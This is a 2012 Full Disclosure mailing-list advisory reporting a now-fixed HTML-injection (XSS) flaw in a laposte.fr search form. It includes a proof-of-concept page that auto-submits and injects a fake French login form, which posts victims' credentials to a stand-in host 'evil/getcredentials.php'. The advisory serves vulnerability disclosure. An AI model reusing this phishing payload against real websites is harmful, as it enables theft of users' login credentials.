Full Disclosure mailing list archives
XSS vulnerability on laposte.fr
From: Emmanuel FARCY <manu.farcy () gmail com>
Date: Wed, 5 Dec 2012 16:05:37 +0100
Website: laposte.fr Version: - Enterprise website:http://www.laposte.fr Status: fixed Level: Low ========= Description ========= La Poste is the main french firm mail services. ========= Details ========= The search form in international posting section is vulnerable to XSS vulnerability: http://www.laposte.fr/courrierinternational/index.php?id=416 Due to an improper sanitization, search field can be used with an XSS attack. Javascript is correcly filtered, but HTML Tag not. ========= Example ========= A forged email can be send like that: <html> <form name="hahaha" method="post" action="http://www.laposte.fr/courrierinternational/index.php?id=416"> <input name="tx_indexedsearch[sword]" id="rechercheAv" value='"></form><br><br><form method="post" action="http://evil/getcredentials.php"><div class="formLog"><fieldset class="fieldsetForm"><legend>Veuillez Vous identifier</legend><label for="login" class="navCachee">Identifiant</label><input type="text" name="user" id="login" value="Email" class="inputSmall"/><br /><label for="password" class="navCachee">Mot de passe</label><input value="mot de passe" type="password"/><br /><input type="submit" id="ok" name="submit" value="Se connecter" class="buttonSmall" /></form><!--' class="input" type="hidden" /> </form> <script> document.hahaha.submit(); </script> </html> Timeline ========= 09/10/2012: bug report with POC 02/11/2012: Vulnerability fixed after several email because they didn't understand the risk (This a POST parameter, how can I be vulnerable, evil must be behind the victim!) 05/12/2012: Advisory published _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS vulnerability on laposte.fr Emmanuel FARCY (Dec 05)